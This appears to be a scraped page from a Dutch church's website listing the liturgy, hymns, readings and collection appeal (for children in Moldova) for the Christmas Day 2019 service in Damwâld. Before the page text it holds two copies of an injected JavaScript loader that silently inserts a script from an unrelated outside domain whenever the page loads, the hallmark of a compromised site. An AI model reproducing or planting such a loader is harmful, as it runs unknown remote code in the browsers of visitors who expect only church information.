;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst woensdag 25 december 2019 9:30 uur - PKN Damwâld
woensdag 25 december 2019
09:30 uur
Eerste Kerstdag

Kerkdienst woensdag 25 december 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Eerste Kerstdag
Liturgie
lied voor de dienst Gezang 134 : 1, 2 en 3
Welkomstwoord
We zingen: Elb 103 :1, 2, 3 en 4
Stil Gebed, Votum en Groet
We zingen: Elb 100 : 1 en 2
Geloofsbelijdenis .
We zingen: Gezang 141 : 1 en 3
Gebed
We lezen: Lucas 2 : 1-7
We zingen: Gezang 143 : 1 en 2
We lezen: Lucas 2 : 8-20
We zingen: Psalm 100 : 1 en 2
Preek .
We zingen: Psalm 68 : 9
Dankgebed en voorbede
Collecte
Slotlied Elb 101
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Geef licht aan vluchtelingenkinderen in Moldavië

Geef licht aan kinderen in de Knel in Moldavië
Voor miljoenen kinderen op deze wereld is het elke dag donker. Ze moeten leven met oorlog, armoede of ziekte. Ook in Moldavië, het armste land van Europa. Veel mensen proberen werk te vinden in het buitenland en laten hun kinderen thuis achter. Kinderen in Moldavië zijn daarom vaak al op jonge leeftijd op zichzelf aangewezen en krijgen niet de zorg die ze zo hard nodig hebben. De organisatie Bethania komt op voor deze kinderen. In twee opvangcentra krijgen kinderen naschoolse opvang, huiswerkbegeleiding en een goede maaltijd. De meeste kinderen die naar het centrum komen, hebben gedragsproblemen. Daarop biedt het centrum psychologische begeleiding en therapie. Bethania wil de kinderen een veilige plek bieden, zorgen dat zij naar school blijven gaan en hun school succesvol kunnen afmaken. Op langere termijn betekent dit dat zij minder risico lopen om verslaafd te raken aan alcohol en drugs en minder kans lopen om het slachtoffer te worden van mensenhandel. Met de opbrengst van deze collecte wil Kerk in Actie kinderen in Moldavië een lichtpuntje bieden in hun donkere bestaan. Ook worden andere Kinderen in de knelprojecten gesteund. Helpt u mee?.

Tweede collecte: Kerk
Uitganscollecte: Kerk